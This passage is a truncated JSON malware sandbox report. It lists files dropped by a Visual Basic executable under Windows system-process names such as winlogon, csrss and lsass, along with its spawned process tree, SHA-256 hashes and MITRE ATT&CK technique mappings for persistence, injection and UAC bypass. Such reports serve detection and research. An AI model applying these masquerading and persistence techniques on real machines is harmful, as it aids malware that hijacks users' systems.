"%LOCALAPPDATA%\\smss.exe", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe (PID: 5136)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_path": "%LOCALAPPDATA%\\winlogon.exe", "file_size": 163903, "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe (PID: 5136)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%WINDIR%\\D3_08.exe", "file_size": 163903, "sha256": "67bd6d15192b770a4848491828e3477f52089603c40924ff6f03bb0066d6e406", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 163903, "sha256": "cede83125b08127f2d65ea09771808bf5e70e82b6ee510df951322b7f4d90941", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 163903, "sha256": "d064fa5ec82f4d1d7698c19212592fdaa2b50efa8e857fc8e5db10c4991e9b0b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "C:\\D3_08.exe", "file_size": 163903, "sha256": "14c6433b7f5b45edec95f6d8ac1cf31c7622bb9d0aaaade2ce4f15f87619dc44", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "CSRSS.EXE (PID: 5628)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_path": "C:\\D3_08\\New Folder.exe", "file_size": 163903, "sha256": "2ba6ba422119a57174ff124d20f250e9e3cc5c819a5a03282e89b44c70830969", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "D3_08.exe (PID: 5404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_path": "C:\\Data %OSUSER%.exe", "file_size": 163903, "sha256": "44161aa301ee7d31827b71366dd21f5168a16a2723c0bfc29aeb5e4af0de1993", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "D3_08.exe (PID: 5404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE.bin", "file_size": 163903, "sha256": "f7c9a891df63fd240296dc31f1381d46cb437cb0e083155d3b6a5189eb0325ef", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 163903, "sha256": "a9f5abcaab4643d0de91a98215a6f7b8e05e9c3c90713dd2737dcbfbc4e1c6b1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4669.bin", "file_size": 163903, "sha256": "99ee9fc22ba6791a4ca93e93b1f12b7e46543e82c7bafcc2e5faac6604d7ff57", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4994.bin", "file_size": 163903, "sha256": "cede83125b08127f2d65ea09771808bf5e70e82b6ee510df951322b7f4d90941", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4992.bin", "file_size": 163903, "sha256": "1e94b5b9176d8de86d421e24e6e568457650068bfb0088996d3def144867652a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4667.bin", "file_size": 163903, "sha256": "8b2500c89fa990ae4c00c2e4a72fa0da52da586b246b0020b33220d65c44a78d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4B9C.bin", "file_size": 163903, "sha256": "67bd6d15192b770a4848491828e3477f52089603c40924ff6f03bb0066d6e406", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)", "7 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8041)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (9 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005136", "name": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe", "normalized_path": "C:\\946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe", "sha256": "946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96"}, {"uid": "00000000-00005404", "parentuid": "00000000-00005136", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "8b2500c89fa990ae4c00c2e4a72fa0da52da586b246b0020b33220d65c44a78d"}, {"uid": "00000000-00005436", "parentuid": "00000000-00005404", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "8b2500c89fa990ae4c00c2e4a72fa0da52da586b246b0020b33220d65c44a78d"}, {"uid": "00000000-00005620", "parentuid": "00000000-00005404", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "99ee9fc22ba6791a4ca93e93b1f12b7e46543e82c7bafcc2e5faac6604d7ff57"}, {"uid": "00000000-00005324", "parentuid": "00000000-00005404", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "e37fb790ad8c10441c2714b4459b9625e2d2830282ed4f303e8ba4e458329fcb"}, {"uid": "00000000-00005628", "parentuid": "00000000-00005404", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "e27cc189f13f412dcab423f49fcb194ac6d42e8d13548874f123806fff7632d2"}, {"uid": "00000000-00005232", "parentuid": "00000000-00005628", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "8b2500c89fa990ae4c00c2e4a72fa0da52da586b246b0020b33220d65c44a78d"}, {"uid": "00000000-00004752", "parentuid": "00000000-00005628", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "99ee9fc22ba6791a4ca93e93b1f12b7e46543e82c7bafcc2e5faac6604d7ff57"}, {"uid": "00000000-00006012", "parentuid": "00000000-00005628", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "e37fb790ad8c10441c2714b4459b9625e2d2830282ed4f303e8ba4e458329fcb"}, {"uid": "00000000-00003240", "parentuid": "00000000-00005628", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "e27cc189f13f412dcab423f49fcb194ac6d42e8d13548874f123806fff7632d2"}, {"uid": "00000000-00004588", "parentuid": "00000000-00005628", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f658ce630dee126d578a245bfd63a2e20417cfda9d93c29ce94727532ee3ac7c"}, {"uid": "00000000-00003984", "parentuid": "00000000-00005628", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ed882ecd03a3332e5f20433a1aa2bab443daf7320bff1f237be49bbb62c94c0f"}, {"uid": "00000000-00004136", "parentuid": "00000000-00005628", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8aba6286ff0173bf64a1f880641c880a4bb52e4d16c20ca04318e3118e3eb9b0"}, {"uid": "00000000-00005284", "parentuid": "00000000-00005404", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f658ce630dee126d578a245bfd63a2e20417cfda9d93c29ce94727532ee3ac7c"}, {"uid": "00000000-00003448", "parentuid": "00000000-00005404", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ed882ecd03a3332e5f20433a1aa2bab443daf7320bff1f237be49bbb62c94c0f"}, {"uid": "00000000-00006088", "parentuid": "00000000-00003448", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "8b2500c89fa990ae4c00c2e4a72fa0da52da586b246b0020b33220d65c44a78d"}, {"uid": "00000000-00004560", "parentuid": "00000000-00003448", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "99ee9fc22ba6791a4ca93e93b1f12b7e46543e82c7bafcc2e5faac6604d7ff57"}, {"uid": "00000000-00003728", "parentuid": "00000000-00003448", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "e37fb790ad8c10441c2714b4459b9625e2d2830282ed4f303e8ba4e458329fcb"}, {"uid": "00000000-00005688", "parentuid": "00000000-00003448", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "e27cc189f13f412dcab423f49fcb194ac6d42e8d13548874f123806fff7632d2"}, {"uid": "00000000-00003376", "parentuid": "00000000-00003448", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f658ce630dee126d578a245bfd63a2e20417cfda9d93c29ce94727532ee3ac7c"}, {"uid": "00000000-00002668", "parentuid": "00000000-00003448", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ed882ecd03a3332e5f20433a1aa2bab443daf7320bff1f237be49bbb62c94c0f"}, {"uid": "00000000-00003388", "parentuid": "00000000-00003448", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8aba6286ff0173bf64a1f880641c880a4bb52e4d16c20ca04318e3118e3eb9b0"}, {"uid": "00000000-00005072", "parentuid": "00000000-00005404", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8aba6286ff0173bf64a1f880641c880a4bb52e4d16c20ca04318e3118e3eb9b0"}, {"uid": "00000000-00005884", "parentuid": "00000000-00005072", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "8b2500c89fa990ae4c00c2e4a72fa0da52da586b246b0020b33220d65c44a78d"}, {"uid": "00000000-00001828", "parentuid": "00000000-00005072", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "99ee9fc22ba6791a4ca93e93b1f12b7e46543e82c7bafcc2e5faac6604d7ff57"}, {"uid": "00000000-00005992", "parentuid": "00000000-00005072", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "e37fb790ad8c10441c2714b4459b9625e2d2830282ed4f303e8ba4e458329fcb"}, {"uid": "00000000-00001164", "parentuid": "00000000-00005072", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "e27cc189f13f412dcab423f49fcb194ac6d42e8d13548874f123806fff7632d2"}, {"uid": "00000000-00001612", "parentuid": "00000000-00005072", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f658ce630dee126d578a245bfd63a2e20417cfda9d93c29ce94727532ee3ac7c"}, {"uid": "00000000-00004164", "parentuid": "00000000-00005072", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ed882ecd03a3332e5f20433a1aa2bab443daf7320bff1f237be49bbb62c94c0f"}, {"uid": "00000000-00003900", "parentuid": "00000000-00005072", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8aba6286ff0173bf64a1f880641c880a4bb52e4d16c20ca04318e3118e3eb9b0"}, {"uid": "00000000-00005412", "parentuid": "00000000-00005136", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "99ee9fc22ba6791a4ca93e93b1f12b7e46543e82c7bafcc2e5faac6604d7ff57"}, {"uid": "00000000-00005244", "parentuid": "00000000-00005412", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "8b2500c89fa990ae4c00c2e4a72fa0da52da586b246b0020b33220d65c44a78d"}, {"uid": "00000000-00005364", "parentuid": "00000000-00005412", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "99ee9fc22ba6791a4ca93e93b1f12b7e46543e82c7bafcc2e5faac6604d7ff57"}, {"uid": "00000000-00005432", "parentuid": "00000000-00005412", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "e37fb790ad8c10441c2714b4459b9625e2d2830282ed4f303e8ba4e458329fcb"}, {"uid": "00000000-00001456", "parentuid": "00000000-00005412", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "e27cc189f13f412dcab423f49fcb194ac6d42e8d13548874f123806fff7632d2"}, {"uid": "00000000-00001288", "parentuid": "00000000-00005412", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f658ce630dee126d578a245bfd63a2e20417cfda9d93c29ce94727532ee3ac7c"}, {"uid": "00000000-00005700", "parentuid": "00000000-00005412", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ed882ecd03a3332e5f20433a1aa2bab443daf7320bff1f237be49bbb62c94c0f"}, {"uid": "00000000-00005728", "parentuid": "00000000-00005412", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8aba6286ff0173bf64a1f880641c880a4bb52e4d16c20ca04318e3118e3eb9b0"}, {"uid": "00000000-00005156", "parentuid": "00000000-00005136", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "e37fb790ad8c10441c2714b4459b9625e2d2830282ed4f303e8ba4e458329fcb"}, {"uid": "00000000-00005916", "parentuid": "00000000-00005156", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "8b2500c89fa990ae4c00c2e4a72fa0da52da586b246b0020b33220d65c44a78d"}, {"uid": "00000000-00000908", "parentuid": "00000000-00005156", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "99ee9fc22ba6791a4ca93e93b1f12b7e46543e82c7bafcc2e5faac6604d7ff57"}, {"uid": "00000000-00002104", "parentuid": "00000000-00005156", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "e37fb790ad8c10441c2714b4459b9625e2d2830282ed4f303e8ba4e458329fcb"}, {"uid": "00000000-00005520", "parentuid": "00000000-00005156", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "e27cc189f13f412dcab423f49fcb194ac6d42e8d13548874f123806fff7632d2"}, {"uid": "00000000-00005756", "parentuid": "00000000-00005156", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f658ce630dee126d578a245bfd63a2e20417cfda9d93c29ce94727532ee3ac7c"}, {"uid": "00000000-00004924", "parentuid": "00000000-00005156", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ed882ecd03a3332e5f20433a1aa2bab443daf7320bff1f237be49bbb62c94c0f"}, {"uid": "00000000-00005644", "parentuid": "00000000-00005156", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8aba6286ff0173bf64a1f880641c880a4bb52e4d16c20ca04318e3118e3eb9b0"}, {"uid": "00000000-00005348", "parentuid": "00000000-00005136", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "e27cc189f13f412dcab423f49fcb194ac6d42e8d13548874f123806fff7632d2"}, {"uid": "00000000-00005808", "parentuid": "00000000-00005136", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f658ce630dee126d578a245bfd63a2e20417cfda9d93c29ce94727532ee3ac7c"}, {"uid": "00000000-00005836", "parentuid": "00000000-00005808", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "8b2500c89fa990ae4c00c2e4a72fa0da52da586b246b0020b33220d65c44a78d"}, {"uid": "00000000-00005192", "parentuid": "00000000-00005808", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "99ee9fc22ba6791a4ca93e93b1f12b7e46543e82c7bafcc2e5faac6604d7ff57"}, {"uid": "00000000-00003652", "parentuid": "00000000-00005808", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "e37fb790ad8c10441c2714b4459b9625e2d2830282ed4f303e8ba4e458329fcb"}, {"uid": "00000000-00005420", "parentuid": "00000000-00005808", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "e27cc189f13f412dcab423f49fcb194ac6d42e8d13548874f123806fff7632d2"}, {"uid": "00000000-00005888", "parentuid": "00000000-00005808", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f658ce630dee126d578a245bfd63a2e20417cfda9d93c29ce94727532ee3ac7c"}, {"uid": "00000000-00003384", "parentuid": "00000000-00005808", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ed882ecd03a3332e5f20433a1aa2bab443daf7320bff1f237be49bbb62c94c0f"}, {"uid": "00000000-00003404", "parentuid": "00000000-00005808", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8aba6286ff0173bf64a1f880641c880a4bb52e4d16c20ca04318e3118e3eb9b0"}, {"uid": "00000000-00005636", "parentuid": "00000000-00005136", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "ed882ecd03a3332e5f20433a1aa2bab443daf7320bff1f237be49bbb62c94c0f"}, {"uid": "00000000-00006092", "parentuid": "00000000-00005136", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "8aba6286ff0173bf64a1f880641c880a4bb52e4d16c20ca04318e3118e3eb9b0"}, {"uid": "00000000-00000708", "parentuid": "00000000-00005136", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "1e94b5b9176d8de86d421e24e6e568457650068bfb0088996d3def144867652a"}, {"uid": "00000000-00001584", "parentuid": "00000000-00000708", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "1e94b5b9176d8de86d421e24e6e568457650068bfb0088996d3def144867652a"}, {"uid": "00000000-00002568", "parentuid": "00000000-00000708", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "cede83125b08127f2d65ea09771808bf5e70e82b6ee510df951322b7f4d90941"}, {"uid": "00000000-00002812", "parentuid": "00000000-00000708", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "f7c9a891df63fd240296dc31f1381d46cb437cb0e083155d3b6a5189eb0325ef"}, {"uid": "00000000-00001080", "parentuid": "00000000-00005136", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "cede83125b08127f2d65ea09771808bf5e70e82b6ee510df951322b7f4d90941"}, {"uid": "00000000-00001000", "parentuid": "00000000-00001080", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "1e94b5b9176d8de86d421e24e6e568457650068bfb0088996d3def144867652a"}, {"uid": "00000000-00002132", "parentuid": "00000000-00005136", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "f7c9a891df63fd240296dc31f1381d46cb437cb0e083155d3b6a5189eb0325ef"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 4, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Change Default File Association", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Screensaver", "attck_id": "T1546.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 4, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Change Default File Association", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Screensaver", "attck_id": "T1546.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", 